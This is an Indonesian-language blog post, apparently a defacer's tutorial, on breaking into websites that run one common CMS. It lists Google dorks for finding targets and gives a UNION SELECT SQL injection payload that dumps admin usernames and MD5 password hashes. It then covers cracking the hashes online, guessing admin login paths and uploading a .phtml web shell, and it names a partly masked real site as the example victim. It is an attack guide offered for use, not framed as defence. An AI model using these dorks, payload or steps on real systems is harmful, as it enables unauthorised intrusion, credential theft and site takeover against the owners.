Langasung saja .
Dork :
- Inurl:kategori-23-hiburan.html
- Inurl:hal-tentang-kami.html
- Inurl:statis-1-pengantar.html
- Inurl:statis-19-beasiswa.html
- Inurl:statis-22-kerjasama.html
- Inurl:kategori-10-perpustakaan.html
Exploit : /union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1.Masukan dork dipencarian seperti Google,bing,yahoo/dsb, Lalu pilih target sesuka kalian, kali ini
target saya adalah http://des*****gok.id/
2.Kemudian tambahkan ekploitnya
www.target.***/union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
2
/u
3.Sekarang sudah kelihatan user sama passwordnya di bagian title :v kemudian ctrl+u untuk melihat
lebih jelasnya.
4.Sudah terlihat user & passnya...karena masih berbentuk MD5 maka harus di decrypt terlebih dahulu
untuk proses decrypt bisa di situs > http://hashkiller.co.uk/md5-decrypter.aspx
5.Untuk loginnya biasanya :
http://site/admin
http://site/adminweb
http://site/administrator
http://site/redaktur
6.Kali ini loginnya berada
http://des*****gok.id/adminweb/
masukkan user & pass
hasilnya akan seperti berikut..
Untuk upload shell bisa dibagian download seperti berikut :
Untuk upload shell biasanya di http://site/files/shellyou
*shell harus berexstensi .phtml
Created by Mr Vandal > Mr Gsl
,
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.
0 comments:
Post a Comment